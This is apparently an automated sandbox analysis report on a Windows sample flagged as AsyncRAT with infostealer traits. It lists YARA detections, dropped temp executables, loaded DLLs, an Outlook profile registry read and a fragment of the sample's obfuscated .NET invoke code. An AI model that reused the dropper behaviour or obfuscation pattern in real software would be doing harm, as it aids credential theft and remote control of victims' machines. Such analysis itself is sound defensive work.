                                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe FB247F5397BA1B2D9328D1ACC2FD322181A91CED1953853ABB41718DC21198AE
                                        Source: DJ5PhUwOsM.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Source: DJ5PhUwOsM.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exeBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exeBinary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exeBinary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe
                                        Source: DJ5PhUwOsM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        Source: DJ5PhUwOsM.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: DJ5PhUwOsM.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                        Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                                        Source: FB_7D21.tmp.exe.0.dr, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                        Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                        Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                        Source: FB_7BD8.tmp.exe.0.drBinary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.I'&
                                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/2@2/4
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeCode function: 0_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,0_2_00401000
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeMutant created: NULL
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeFile created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmpJump to behavior
                                        Source: DJ5PhUwOsM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        Source: DJ5PhUwOsM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                        Source: DJ5PhUwOsM.exeReversingLabs: Detection: 92%
                                        Source: unknownProcess created: C:\Users\user\Desktop\DJ5PhUwOsM.exe "C:\Users\user\Desktop\DJ5PhUwOsM.exe"
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" Jump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" Jump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: apphelp.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: windows.storage.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: wldp.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: kernel.appcore.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: uxtheme.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: propsys.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: profapi.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: edputil.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: urlmon.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: iertutil.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: srvcli.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: netutils.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: sspicli.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: wintypes.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: appresolver.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: bcp47langs.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: slc.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: userenv.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: sppc.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: mscoree.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: apphelp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: version.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: uxtheme.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: windows.storage.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: wldp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: profapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: cryptsp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: rsaenh.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: cryptbase.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: wbemcomn.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: amsi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: userenv.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: sspicli.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: rasapi32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: rasman.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: rtutils.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: mswsock.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: winhttp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: dhcpcsvc.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: dnsapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: winnsi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: secur32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: schannel.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ntasn1.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ncrypt.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: msasn1.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: gpapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: vaultcli.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeSection loaded: wintypes.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: mscoree.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: apphelp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: version.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: uxtheme.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: cryptsp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: rsaenh.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: cryptbase.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: sspicli.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: windows.storage.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: wldp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: profapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: edputil.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: wbemcomn.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: textinputframework.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: coreuicomponents.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: coremessaging.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ntmarta.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: wintypes.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: wintypes.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: wintypes.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: amsi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: userenv.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: rasapi32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: rasman.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: rtutils.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: mswsock.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: winhttp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: dhcpcsvc.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: dnsapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: secur32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: schannel.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ntasn1.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ncrypt.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: msasn1.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: gpapi.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: avicap32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: msvfw32.dllJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeSection loaded: winmm.dllJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

                                        Data Obfuscation

                                        barindex
                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
